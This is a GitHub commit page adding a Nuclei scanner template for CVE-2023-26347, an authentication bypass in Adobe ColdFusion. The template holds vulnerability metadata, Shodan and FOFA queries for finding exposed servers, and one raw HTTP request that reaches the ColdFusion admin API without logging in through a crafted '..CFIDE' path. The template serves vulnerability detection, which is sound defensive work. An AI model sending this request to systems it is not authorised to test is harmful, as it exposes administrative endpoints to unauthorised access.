Skip to content

Commit

Permalink
Merge pull request #8690 from projectdiscovery/CVE-2023-26347
Browse files Browse the repository at this point in the history
Create CVE-2023-26347.yaml (Adobe Coldfusion - Authentication Bypass) 馃敟
  • Loading branch information
pussycat0x committed Nov 23, 2023
2 parents 82235db + 97d92e7 commit 7a7cc95
Showing 1 changed file with 48 additions and 0 deletions.
48 changes: 48 additions & 0 deletions http/cves/2023/CVE-2023-26347.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
id: CVE-2023-26347

info:
name: Adobe Coldfusion - Authentication Bypass
author: salts
severity: high
description: |
Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An unauthenticated attacker could leverage this vulnerability to access the administration CFM and CFC endpoints. Exploitation of this issue does not require user interaction.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-26347
- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
remediation: |
Update to the latest version of Adobe Coldfusion
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-26347
cwe-id: CWE-284
epss-score: 0.00044
epss-percentile: 0.08651
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: adobe
product: coldfusion
shodan-query: http.component:"Adobe ColdFusion"
fofa-query: app="Adobe-ColdFusion"
tags: cve,cve2023,adobe,coldfusion,auth-bypass

http:
- raw:
- |
GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'wddxPacket version='
- '<string>'
condition: and

- type: status
status:
- 200

0 comments on commit 7a7cc95

Please sign in to comment.